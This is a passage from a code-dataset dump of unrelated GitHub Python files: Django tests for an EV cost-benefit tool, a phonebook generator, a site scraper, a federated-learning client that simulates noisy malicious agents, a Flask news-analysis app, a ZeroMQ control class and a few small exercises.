GasConsumptionTests(APITestCase):\n\n consumption = {\n 'Gasoline_Consumption_gallons': 545619941.6,\n 'Gasoline_Consumption_MMBTU': 65734108089476.5,\n 'Gasoline_Emissions_CO2': 4637769.504,\n 'PHEV_10_Gasoline_Consumption_gallons': 24929.58517,\n 'PHEV_10_Gasoline_Consumption_MMBTU': 3003416703,\n 'PHEV_10_Gasoline_Emissions_CO2': 211.9014739,\n 'PHEV_20_Gasoline_Consumption_gallons': 69108.54055,\n 'PHEV_20_Gasoline_Consumption_MMBTU': 8325920531,\n 'PHEV_20_Gasoline_Emissions_CO2': 587.4225947,\n 'PHEV_40_Gasoline_Consumption_gallons': 95172.95918,\n 'PHEV_40_Gasoline_Consumption_MMBTU': 11466057430,\n 'PHEV_40_Gasoline_Emissions_CO2': 808.970153,\n 'BEV_100_Gasoline_Consumption_gallons': 67142.92642,\n 'BEV_100_Gasoline_Consumption_MMBTU': 8089111204,\n 'BEV_100_Gasoline_Emissions_CO2': 570.7148746,\n 'EV_Share': 0.001533283\n }\n\n def test_create_gas_consumption(self):\n \"\"\"Ensure we can create a new gas consumption object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_gas_consumption_config(lf_config, GasConsumptionConfigTests.year)\n config = GasConsumptionConfig.objects.get()\n response = create_gas_consumption(config, json.dumps(self.consumption))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(GasConsumption.objects.count(), 1)\n obj = GasConsumption.objects.get()\n self.assertEqual(obj.config.year, GasConsumptionConfigTests.year)\n self.assertEqual(json.loads(obj.consumption), self.consumption)\n\n\nclass CostBenefitTests(APITestCase):\n\n cost_benefit = {\n 'Utility_Bills': 1643285.189,\n 'Utility_Bills_res': 1574878.503,\n 'Utility_Bills_work': 27523.12322,\n 'Utility_Bills_pub_L2': 40883.56269,\n 'Utility_Bills_DCFC': 0,\n 'Incremental_upfront_vehicle_cost': 15713196.73,\n 'Charging_infrastructure_cost':\t4573543.239,\n 'Charging_infrastructure_cost_res':\t2920300,\n 'Charging_infrastructure_cost_work_L2':\t632882.3529,\n 'Charging_infrastructure_cost_public_L2': 430360,\n 'Charging_infrastructure_cost_DCFC': 590000.8865,\n 'Avoided_vehicle_gasoline ($)':\t4604521.161,\n 'Avoided_vehicle_gasoline (gallons)': 2029634.905,\n 'Vehicle_O&M_Savings': 307236,\n 'Federal_EV_Tax_Credit': 10166700,\n 'Vehicle_sales': 1537,\n 'Transmission_and_Distribution_Cost': 127854.8147,\n 'Distribution_Cost': 87146.31329,\n 'Transmission_Cost': 40708.50144,\n 'Cumulative_personal_light-duty_EV_population':\t6878,\n 'Cumulative_personal_light-duty_LDV_population': 1293819,\n 'EV_sales_as_percentage_of_total_personal_light-duty_vehicles':\t0.001187956,\n 'Peak_Demand_5-9_PM': 6.913490911,\n 'Energy_Supply_Cost': 687051.7026,\n 'Energy_Cost': 531222.3664,\n 'Capacity_Cost': 155829.3361\n }\n\n def test_create_cost_benefit(self):\n \"\"\"Ensure we can create a new cost benefit object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_cost_benefit_config(lf_config, CostBenefitConfigTests.year)\n config = CostBenefitConfig.objects.get()\n response = create_cost_benefit(config, json.dumps(self.cost_benefit))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(CostBenefit.objects.count(), 1)\n obj = CostBenefit.objects.get()\n self.assertEqual(obj.config.year, CostBenefitConfigTests.year)\n self.assertEqual(json.loads(obj.cost_benefit), self.cost_benefit)\n\n\nclass NetPresentValueTests(APITestCase):\n\n net_present_value = {\n 'Utility_Bills': 250514400.4,\n 'Utility_Bills_volumetric':\t250059210.3,\n 'Utility_Bills_demand':\t455190.0426,\n 'Utility_Bills_res': 240325818.2,\n 'Utility_Bills_work': 4088140.725,\n 'Utility_Bills_pub_L2':\t6100441.406,\n 'Utility_Bills_DCFC': 0,\n 'Incremental_upfront_vehicle_cost':\t91394525.43,\n 'Charging_infrastructure_cost': 324375153.1,\n 'Charging_infrastructure_cost_res':\t207241475.2,\n 'Charging_infrastructure_cost_work_L2':\t44902567.99,\n 'Charging_infrastructure_cost_public_L2': 30533746.23,\n 'Charging_infrastructure_cost_DCFC': 41697363.66,\n 'Avoided_vehicle_gasoline':\t802838445.2,\n 'Vehicle_O&M_Savings': 207528684.2,\n 'Federal_EV_Tax_Credit': 121338516.8,\n 'Energy_Supply_Cost': 80844635.85,\n 'Energy_Cost': 80844635.85,\n 'Generation_Capacity_Cost':\t23490407.75,\n 'Vehicle_Sales': 132772.6619,\n 'Transmission_and_Distribution_Cost': 15056754.47,\n 'Distribution_Cost': 8905317.194,\n 'Transmission_Cost': 6151437.278\n }\n\n def test_create_net_present_value(self):\n \"\"\"Ensure we can create a new net present value object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_net_present_value_config(lf_config, NetPresentValueConfigTests.year)\n config = NetPresentValueConfig.objects.get()\n response = create_net_present_value(config, json.dumps(self.net_present_value))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(NetPresentValue.objects.count(), 1)\n obj = NetPresentValue.objects.get()\n self.assertEqual(obj.config.year, NetPresentValueConfigTests.year)\n self.assertEqual(json.loads(obj.npv), self.net_present_value)\n\n\nclass EmissionTests(APITestCase):\n\n emissions = {\n 'CO2_emissions': 11809.74895,\n 'NOX_emissions': 8.537033476,\n 'PM_10_emissions': 0.41418928,\n 'SO2_emissions': 2.786595841,\n 'VOC_emissions': 0.13171142\n }\n\n def test_create_emission(self):\n \"\"\"Ensure we can create a new emission object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_emission_config(lf_config, EmissionConfigTests.year)\n config = EmissionConfig.objects.get()\n response = create_emission(config, json.dumps(self.emissions))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Emission.objects.count(), 1)\n obj = Emission.objects.get()\n self.assertEqual(obj.config.year, EmissionConfigTests.year)\n self.assertEqual(json.loads(obj.emissions), self.emissions)\n","repo_name":"slacgismo/SCRIPT-tool","sub_path":"webserver/script/tests/test_algorithms.py","file_name":"test_algorithms.py","file_ext":"py","file_size_in_byte":24051,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"8094183693","text":"import csv\nimport random\ndef create_phonebook(n):\n \"\"\" creates n text files in the current directory,\n each containing a first name, last name,\n and a phone number.\n \"\"\"\n numbers = phone_number_generator(n) #a list of phone numbers\n first_names = csv_to_list('firstNames.csv') #list of possible first names\n last_names = csv_to_list('lastNames.csv') #list of possible last names\n for i in range(n): #loop to create n entries in the phonebook\n f = open(str(i)+\".txt\", 'w+') #create a text file we can write to\n name1 = random.choice(first_names) #pick a first name\n name2 = random.choice(last_names) #pick a last name\n order = random.choice([0,1]) #decide if order is \"first last\" or \"last, first\"\n if order: \n f.write(numbers[i] + '\\n' + name1 + ' ' + name2) #write to file we created earlier\n else: f.write(numbers[i] + '\\n' + name2 + ', ' + name1) #same as above\n\ndef csv_to_list(filename):\n \"\"\" creates a list of the contents of the csv\n \"\"\"\n out = []\n with open(filename, newline = '') as f: #open csv file containing names\n reader = csv.reader(f) #read the file\n for row in reader: #loop over rows of the file \n out += row #add contents of row (a name) to the final list\n return out #return list\n\ndef phone_number_generator(n):\n \"\"\" Takes as input an int n, and randomly generates \n a list of n phone numbers of various styles \n \"\"\"\n output = []\n for i in range(n):\n number = generator(random.choice(range(10))) #randomly picks a style of number\n output += [number]\n return output\n\n#helper function for phone_number_generator\ndef generator(style):\n \"\"\" outputs a number consistent with style\n specified by the input\n \"\"\"\n num = autogenerator() #calls autogenerator to create ten digit string\n if style == 0:\n return num #1234567890\n elif style == 1:\n return '(' + num[:3] + ')' + num[3:] #(123)4567890\n elif style == 2:\n return '(' + num[:3] + ')' + num[3:6] + '-' + num[6:] #(123)456-7890\n elif style == 3:\n return num[:3] + '.' + num[3:6] + '.' + num[6:] #123.456.7890\n elif style == 4:\n return '442-' + num[3:6] + '-' + num[6:] #442-456-7890\n elif style == 5:\n return '402 ' + num[3:] #402 4567890\n elif style == 6:\n return '(909) ' + num[3:6] + '-' + num[6:] #(909) 456-7890\n elif style == 7:\n return '442 ' + num[3:6] + ' ' + num[6:] #442 456 7890\n elif style == 8:\n return '(760)' + num[3:] #(760)4567890\n else:\n return num[3:] #4567890\n\n#helper function for generator\ndef autogenerator():\n \"\"\" creates ten digit string of numbers\n that could be a phone number\n \"\"\"\n number = '0'\n while number[0] not in '23456789': #check if valid phone number (area codes don't start with 1 or 0)\n number = ''\n for i in range(10):\n digit = random.choice(range(10)) #pick a random number\n number += str(digit) \n return number \n\ncreate_phonebook(4)","repo_name":"ScriptingBeyondCS/CS-35","sub_path":"week_0_to_2/tree_generation/phonebook_generator.py","file_name":"phonebook_generator.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14909780369","text":"#-*- coding: utf-8 -*- \n#------------------------------------- \n#version: 0.1 \n#note:实现了查找0daydown最新发布的10页资源。 \n#------------------------------------- \n#------------------------------------- \n#version: 0.2 \n#note:在v0.1基础上输出内容到一个指定TXT文件中 \n#------------------------------------- \n \nimport urllib.request \nimport sys \n \nfrom bs4 import BeautifulSoup \n \nold = sys.stdout #保存系统默认输出 \n#fp = open(\"test1.txt\",'w') \nfp = open(\"test1.txt\",'w', encoding=\"utf-8\") #以utf-8进行文件编码 \nsys.stdout = fp #输出重定向到一个文件中 \n \nfor i in range(1,11): \n url = \"http://www.0daydown.com/page/\" + str(i) #每一页的Url只需在后面加上整数就行 \n page = urllib.request.urlopen(url) \n soup_packtpage = BeautifulSoup(page,'html.parser')\n page.close() \n num = \" The Page of: \" + str(i) #标注当前资源属于第几页 \n print(num) \n print(\"#\"*40) \n for article in soup_packtpage.find_all('article', class_=\"excerpt\"): #使用find_all查找出当前页面发布的所有最新资源 \n print(\"Category:\".ljust(20), end=''), print(article.header.a.next) #category \n print(\"Title:\".ljust(20), end=''), print(article.h2.string) #title \n print(\"Pulished_time:\".ljust(19), end=''), print(article.p.find('i', class_=\"icon-time icon12\").next) #published_time \n print(\"Note:\", end='') \n print(article.p.find_next_sibling().string) #note \n print('-'*50) \n \nfp.close() \nsys.stdout = old #恢复系统默认输出 \nprint(\"Done!\") \ninput() #等待输入,为了不让控制台运行后立即结束\n","repo_name":"bofk/mygit","sub_path":"python_spider/爬取网站首页简略内容.py","file_name":"爬取网站首页简略内容.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37048902613","text":"# COMMAND PATTERN -\r\nimport abc\r\nimport sys\r\nfrom io import StringIO\r\n\r\n\r\nclass Command(abc.ABC):\r\n @abc.abstractmethod\r\n def execute(self, *args, **kwargs):\r\n pass\r\n\r\n\r\nclass AddCommand(Command):\r\n def execute(self, *args, **kwargs):\r\n ll, value = args\r\n ll.append(value)\r\n\r\n\r\nclass SumCommand(Command):\r\n def execute(self, *args, **kwargs):\r\n (ll,) = args\r\n return sum(ll)\r\n\r\n\r\nclass ListCommand(Command):\r\n def execute(self, *args, **kwargs):\r\n (ll,) = args\r\n return ll\r\n\r\n\r\nsys.stdin = StringIO(\"\"\"Add 1\r\nAdd 2\r\nSum\r\nList\r\nAdd 4\r\nSum\r\nList\r\nEnd\r\n\"\"\"\r\n )\r\nll = []\r\n\r\nwhile True:\r\n command = input()\r\n if command == \"End\":\r\n break\r\n\r\n if command.startswith(\"Add\"):\r\n _, value_str = command.split(\" \")\r\n ll.append(int(value_str))\r\n\r\n elif command == \"List\":\r\n print(ll)\r\n\r\n elif command == \"Sum\":\r\n print(sum(ll))\r\n","repo_name":"KristianAleksiev/Python-Advanced-OOP","sub_path":"20.Design_Patterns/behavioral_command_pattern.py","file_name":"behavioral_command_pattern.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4698376109","text":"# Import packages\nimport argparse\nimport numpy as np\nimport pickle\n\nfrom socket import socket, AF_INET, SOCK_STREAM\nimport sys\nimport torch\n\nfrom data import get_dataset\nfrom net import Net_CIFAR, Net_MNIST\nimport torch\nimport random\n\n# Constants/configurations\nENCODING = 'utf-8' # message encoding\nBUFFER_SIZE = 2048 # fixed 2KB buffer size\nPORT = 1234 # fixed application port\nPRINT_INFO = True\n\nclass SingleModelClient:\n def compute_gradient(self):\n self.model.train()\n self.model.zero_grad()\n\n images, labels = self.dataset\n sample_indices = np.random.choice(list(range(labels.shape[0])), size=(self.num_samples_per_update, ), replace=False)\n images, labels = images[sample_indices], labels[sample_indices]\n \n outputs = self.model(images)\n loss = self.model.loss_fn(outputs, labels)\n loss.backward()\n\n self.num_compute += 1\n\n return [x.grad for x in self.model.parameters()]\n \n def update_model(self):\n # Recieve updated gradient\n new_model_weights = []\n while True:\n msg = self.client.recv(BUFFER_SIZE)\n if not msg:\n print('ERROR: server disconnected')\n break\n if len(msg) != 2048:\n try:\n if msg[-6:].decode(encoding=ENCODING) == 'FINISH':\n new_model_weights.append(msg[:-6])\n break\n except:\n new_model_weights.append(msg)\n continue\n new_model_weights.append(msg)\n # Try to update model. Return True if successful.\n try:\n new_model_weights = pickle.loads(b\"\".join(new_model_weights))\n \n # Update model\n for variable, new_weights in zip(self.model.parameters(), new_model_weights):\n variable.data = new_weights # *** + NOISE\n return True\n except:\n return False\n\n def evaluate_model(self):\n self.model.eval()\n correct_samples = 0\n with torch.no_grad():\n images, labels = self.dataset\n outputs = self.model(images)\n predictions = outputs.argmax(dim=1, keepdim=True)\n \n correct_samples += predictions.eq(labels.view_as(predictions)).sum().item()\n\n acc = 100. * correct_samples / labels.shape[0]\n return acc\n\n def __init__(\n self,\n device_num,\n dataset_name,\n lr,\n num_samples_per_device,\n num_samples_per_update,\n sampling_method,\n server_ip,\n ):\n self.device_num = device_num\n self.dataset_name = dataset_name\n self.lr = lr\n self.num_samples_per_device = num_samples_per_device\n self.num_samples_per_update = num_samples_per_update\n self.sampling_method = sampling_method\n self.server_ip = server_ip\n self.num_compute = 0 # number of times calculating gradient\n\n # Create model\n self.model = Net_MNIST()\n\n # Create local dataset\n self.dataset = get_dataset(self.dataset_name, self.num_samples_per_device, self.sampling_method)\n\n # Connect to server\n self.client = socket(family=AF_INET, type=SOCK_STREAM)\n self.client.connect((self.server_ip, PORT))\n\ndef main():\n print(\"********** Federated Serving: devices **********\")\n\n # Parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset-name\", type=str, default='mnist', help='Dataset')\n parser.add_argument(\"--lr\", type=float, default=0.0001, help='Learning rate')\n parser.add_argument(\"--num-devices\", type=int, default=10, help='Number of devices.')\n parser.add_argument(\"--num-rounds\", type=int, default=100, help='Number of rounds.')\n parser.add_argument(\"--num-samples-per-device\", type=int, default=5000, help='Number of training samples per device.')\n parser.add_argument(\"--num-samples-per-update\", type=int, default=100, help='Number of training samples per device update.')\n parser.add_argument(\"--sampling-method\", type=str, default='iid', help='Dataset sampling method')\n parser.add_argument(\"--server-ip\", type=str, default='localhost', help='Server IP address')\n parser.add_argument(\"--enable-malicious-agent\", type=str, default='False', help='Enable malicious agents.')\n parser.add_argument(\"--num-malicious-agents\", type=int, default=1, help='Number of malicious agents.')\n parser.add_argument(\"--noise-level\", type=int, default=10, help='Multiple of random.random (0~1)')\n parser.add_argument(\"--noise-type\", type=int, default=0, help='0: white noise (random noise for each value); 1: uniform noise (one random noise value for each layer)')\n args = parser.parse_args()\n\n devices = []\n all_accuracies = []\n\n for device_num in range(args.num_devices):\n devices.append(SingleModelClient(device_num+1, args.dataset_name, args.lr, args.num_samples_per_device, args.num_samples_per_update, args.sampling_method, args.server_ip))\n print('CLIENT ({}/{}) connected to server @ {}:{}'.format(device_num+1, args.num_devices, args.server_ip, PORT))\n\n iteration = 1\n while True:\n if PRINT_INFO:\n print(\"Iteration {}\".format(iteration))\n # Compute gradients\n gradients = []\n for device_num in range(args.num_devices):\n tmp_grad = devices[device_num].compute_gradient()\n # Malicious agent: noisy gradient update\n if args.enable_malicious_agent == \"True\":\n if iteration > 40:\n # Malicious agent assignments starts from 0\n if device_num < args.num_malicious_agents:\n for layer_grad in tmp_grad:\n if args.noise_type == 0:\n layer_grad += (2 * args.noise_level * torch.rand(layer_grad.shape) - args.noise_level)\n else:\n layer_grad += (2 * args.noise_level * random.random() - args.noise_level) \n gradients.append(tmp_grad)\n if PRINT_INFO:\n print('All devices computed gradients')\n\n # Send gradients\n for device_num in range(args.num_devices):\n try:\n devices[device_num].client.send(pickle.dumps(gradients[device_num]))\n devices[device_num].client.send('FINISH'.encode(encoding=ENCODING))\n except:\n print('Server shut down. Finished training.')\n break\n if PRINT_INFO:\n print('All devices sent gradients')\n\n # Recieve model weights and update model\n for device_num in range(args.num_devices):\n update_success = devices[device_num].update_model()\n if not update_success:\n break\n if PRINT_INFO:\n print ('All devices recieved model weights and updated model')\n\n # Accuracy evaluation\n accuracies = []\n for device_num in range(args.num_devices):\n accuracies.append(devices[device_num].evaluate_model())\n all_accuracies.append(accuracies)\n if PRINT_INFO:\n print('Mean Acc: {}%'.format(np.mean(accuracies)))\n print('All Accs: {}%'.format(accuracies))\n iteration += 1\n\n if iteration > 100:\n break\n\n all_accuracies = np.array(all_accuracies)\n with open('accuracies_1agent_1noise_ad.npy', 'wb') as outfile:\n np.save(outfile, all_accuracies)\n \nif __name__ == '__main__':\n main()","repo_name":"samhsia/CS262-FinalProject","sub_path":"src/fl_client.py","file_name":"fl_client.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29376465778","text":"import datetime\nfrom calendar import month_name\nfrom os import path\nimport logging\nimport sys\n\nfrom flask import Flask, render_template, abort, request, redirect, send_from_directory, url_for, flash, jsonify\nfrom flask.json import dumps, loads\n\nimport analysis.sentiment_analysis as sent\nfrom analysis import chart_data\nfrom analysis.statistics import SimpleWordStatistics\nfrom db import mongo_db as db\nfrom utils.settings import APP_BACKUPS, APP_LOGS\nfrom utils.journals import JOURNALS\nimport fetcher\n\nlog_level = logging.INFO\nlogging.basicConfig(\n filename=path.join(APP_LOGS, \"app.log\"),\n level=log_level,\n format='%(asctime)s %(levelname)s %(name)s %(message)s'\n)\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(log_level)\nlogger.addHandler(handler)\nlogger.info(\"Successfully configured logger\")\n\nMONGODB_HOST = 'localhost'\nMONGODB_PORT = 27017\n\n\n# TODO find better way to link journals to MongoDB\n\n\ndef sort_journals_by_display_key(journal):\n return journal[1][\"Display\"]\n\napp = Flask(__name__)\napp.secret_key = \"secret_key\"\napp.config.from_object(__name__)\n\n\n@app.route(\"/\")\ndef index():\n return render_start_page()\n\n\n@app.route(\"/fetch/\")\ndef fetch(coll_name):\n if coll_name not in JOURNALS \\\n or not JOURNALS[coll_name][\"Crawler\"] \\\n or not JOURNALS[coll_name][\"BaseLink\"] \\\n or not JOURNALS[coll_name][\"Sections\"] \\\n or not JOURNALS[coll_name][\"Indexer\"]:\n logger.error(f\"configuration of collection {coll_name} seems not to be complete. Cannot fetch articles.\")\n abort(501)\n if fetcher.get_state(coll_name) is fetcher.FetcherState.ready:\n fetcher.start_fetch(coll_name)\n flash(f\"fetching of journal {coll_name} has started\", \"success\")\n else:\n flash(f\"server is already fetching stories for {coll_name}\", \"error\")\n return render_start_page()\n\n\n@app.route('/task_info/')\ndef task_info(coll_name):\n state_str = \"uninitialized\"\n st = fetcher.get_state(coll_name)\n if st:\n state_str = st.name\n return jsonify(\n state=state_str,\n fetched=fetcher.get_fetched_amount(coll_name),\n total=fetcher.get_total_stories(coll_name),\n recentAction=fetcher.get_recent_action(coll_name),\n progress=fetcher.get_progress(coll_name)\n )\n\n\ndef render_start_page():\n for coll_name, journal in JOURNALS.items():\n journal[\"article_count\"] = db.get_count(coll_name)\n return render_template(\"index.html\",\n journals=sorted(JOURNALS.items(), key=sort_journals_by_display_key))\n\n\ndef sort_for_show_journal(story):\n return story[\"text_sent\"]\n\n\n@app.route(\"/show_journal/\")\ndef show_journal(coll_name):\n journal = JOURNALS[coll_name]\n if not journal: abort(501)\n journal_name = journal[\"Display\"]\n section_chart = chart_data.article_amount_per_section(coll_name)\n month_chart = chart_data.article_amount_per_month(coll_name)\n month_sent_chart = chart_data.avg_sent_per_month(coll_name)\n section_sent_chart = chart_data.avg_sent_per_section(coll_name)\n\n return render_template(\n \"show_journal.html\",\n stories=sorted(list(db.find(coll_name)), key=sort_for_show_journal),\n journal_name=journal_name,\n section_chart=section_chart,\n month_chart=month_chart,\n month_sent_chart=month_sent_chart,\n section_sent_chart=section_sent_chart\n )\n\n\n@app.route(\"/most_common/\")\ndef most_common(coll_name):\n word_stat = SimpleWordStatistics()\n word_stat.feed_from_db(db.find(coll_name))\n result = [(word, amt, sent.sent_for_normalized(word)) for word, amt in word_stat.get_top_frequent(100)]\n return render_template(\"most_common.html\", result=result)\n\n\n@app.route(\"/most_common_by_month/\")\ndef most_common_by_month(coll_name):\n word_stat = SimpleWordStatistics()\n result = [] # list of dict (month_label, month_result)\n for year, month, docs in db.group_by_month(coll_name):\n month_label = f\"{month_name[month]} {year}\"\n word_stat.feed_from_db(docs)\n month_result = [(word, amt, sent.sent_for_normalized(word)) for word, amt in word_stat.get_top_frequent(100)]\n word_stat.clear()\n result.append((month_label, month_result))\n return render_template(\"most_common_by_month.html\", result=result)\n\n\n@app.route(\"/term_analysis/\")\ndef term_analysis():\n term = request.args.get(\"term\")\n charts = []\n for coll_name, journal in JOURNALS.items():\n if not db.is_empty(coll_name):\n idf_month_chart = chart_data.idf_per_month(term, coll_name)\n idf_section_chart = chart_data.idf_per_section(term, coll_name)\n sent_chart = chart_data.avg_sent_per_month(coll_name, term)\n charts.append({\n \"journal_name\": journal[\"Display\"],\n \"idf_month_chart\": idf_month_chart,\n \"idf_section_chart\": idf_section_chart,\n \"sent_chart\": sent_chart\n })\n return render_template(\"term_analysis.html\", term=term, charts=charts)\n\n\n@app.route(\"/json_backup/\")\ndef json_backup(coll_name):\n docs = [doc for doc in db.select_for_backup(coll_name)]\n filename = f\"backup_{coll_name}.json\"\n backup_path = path.join(APP_BACKUPS, filename)\n content = dumps(docs)\n with open(backup_path, \"w\") as target:\n target.write(content)\n return send_from_directory(APP_BACKUPS, filename)\n\n\n@app.route(\"/load_json_form/\")\ndef load_json_form(coll_name):\n return render_template(\"load_articles_form.html\", coll_name=coll_name)\n\n\n@app.route(\"/load_from_json\", methods=[\"post\"])\ndef load_from_json():\n coll_name = None\n for journal in JOURNALS.keys():\n if f\"json_file_{journal}\" in request.files:\n coll_name = journal\n if not coll_name:\n abort(418) # i'm a teapot\n file = request.files[f\"json_file_{coll_name}\"]\n content = file.read()\n docs = loads(content)\n\n # turn published dates back to datetime \"Sun, 05 Feb 2017 14:59:00 GMT\"\n for doc in docs:\n pub_date = datetime.datetime.strptime(doc[\"published\"], \"%a, %d %b %Y %H:%M:%S GMT\")\n doc[\"published\"] = pub_date\n\n db.insert_many(coll_name, docs)\n return redirect(url_for(\"index\"))\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"RomanKuratli/NewsCrawler","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33071899011","text":"import struct\nimport zmq\n\nclass ProtocolError(Exception):\n pass\n\nclass CtrlPort:\n\n _CMD_REQ_SET_FREQ = 100\n _CMD_REQ_SET_GAIN = 101\n _CMD_REQ_SET_ANT = 102\n\n _CMD_REP_OK = 200\n _CMD_REP_BAD = 400\n\n def __init__(self, host, port=21233):\n\n self._endpoint = 'tcp://%s:%d' %(host, port)\n\n self._context = zmq.Context()\n self._socket = self._context.socket(zmq.REQ)\n self._socket.connect(self._endpoint)\n\n def setFreq(self, freq):\n\n # Form and send the request.\n req = struct.pack('hf', self._CMD_REQ_SET_FREQ, freq)\n self._socket.send(req)\n\n # Get the reply \n rep = self._socket.recv()\n code, = struct.unpack('h', rep)\n\n # Check the result\n if (code != self._CMD_REP_OK):\n raise ProtocolError('CMD_REP_BAD: Set frequency %f.' %(freq))\n\n def setAnt(self, ant):\n\n # Form and send the request.\n req = struct.pack('hI', self._CMD_REQ_SET_ANT, ant)\n self._socket.send(req)\n\n # Get the reply \n rep = self._socket.recv()\n code, = struct.unpack('h', rep)\n\n # Check the result\n if (code != self._CMD_REP_OK):\n raise ProtocolError('CMD_REP_BAD: Set antenna %d.' %(ant))\n\n def setGain(self, gain):\n\n # Form and send the request.\n req = struct.pack('hf', self._CMD_REQ_SET_GAIN, gain)\n self._socket.send(req)\n\n # Get the reply \n rep = self._socket.recv()\n code, = struct.unpack('h', rep)\n\n # Check the result\n if (code != self._CMD_REP_OK):\n raise ProtocolError('CMD_REP_BAD: Set gain %f.' %(gain))\n\n","repo_name":"nsbruce/usrp-emi-prototype","sub_path":"py-emi/CtrlPort.py","file_name":"CtrlPort.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26059779088","text":"import sys\nsys.stdin = open('input.txt')\n\ntest_case = int(input())\nfor tc in range(1, test_case+1):\n N = int(input())\n arr = []\n for i in range(N):\n alphabet, num = input().split()\n arr.append(alphabet*int(num))\n result = ''\n for i in range(len(arr)):\n result += arr[i]\n\n print(f'#{tc}')\n for i in range((len(result)//10)+1):\n for j in range(i*10, (i+1)*10):\n print(result[j], end='')\n if j == len(result)-1:\n break\n print()","repo_name":"SWan9710/algorithm","sub_path":"algorithm/02_Extra_problem/1946_zip/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25672593938","text":"import unittest\nfrom os import path\nfrom src.data import HouseData\nimport json\n\n\nclass TestParse(unittest.TestCase):\n\n def test_parse_house_data(self):\n with open(path.join('test', 'test.html'), 'r') as f:\n html = f.read()\n all_house_data = HouseData.parse(html)\n s = json.dumps(all_house_data, ensure_ascii=False,\n indent=4, cls=HouseData.Encoder)\n try:\n with open(path.join('test', 'test_all_house_data.json'), 'r') as f:\n assert (f.read() == s)\n except FileNotFoundError:\n with open(path.join('test', 'test_all_house_data.json'), 'w') as f:\n f.write(s)\n\n def test_parse_projecr_rule(self):\n with open(path.join('test', 'test_project_rule.json'), 'r') as f:\n json_object = json.loads(f.read())\n house_data = HouseData()\n house_data.parse_project_rule(json_object['message'])\n","repo_name":"LaPluses/chengdu_house_spider_2","sub_path":"test/house_data_parse_test.py","file_name":"house_data_parse_test.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12838289291","text":"# -*- coding: utf-8 -*-\nimport sys\nimport uuid\nimport requests\nimport hashlib\nimport time\nfrom imp import reload\nfrom config import youdao\n\nimport time\n\n\nYOUDAO_URL = youdao['url']\nAPP_KEY = youdao['app_id']\nAPP_SECRET = youdao['app_secret']\n\n\ndef changeUpper(text: str, index: int) -> str:\n new_text = ''\n for i in range(len(text)):\n if i == index:\n new_text += text[i].upper()\n else:\n new_text += text[i]\n return new_text\n\n\ndef encrypt(signStr):\n hash_algorithm = hashlib.sha256()\n hash_algorithm.update(signStr.encode('utf-8'))\n return hash_algorithm.hexdigest()\n\n\ndef truncate(q):\n if q is 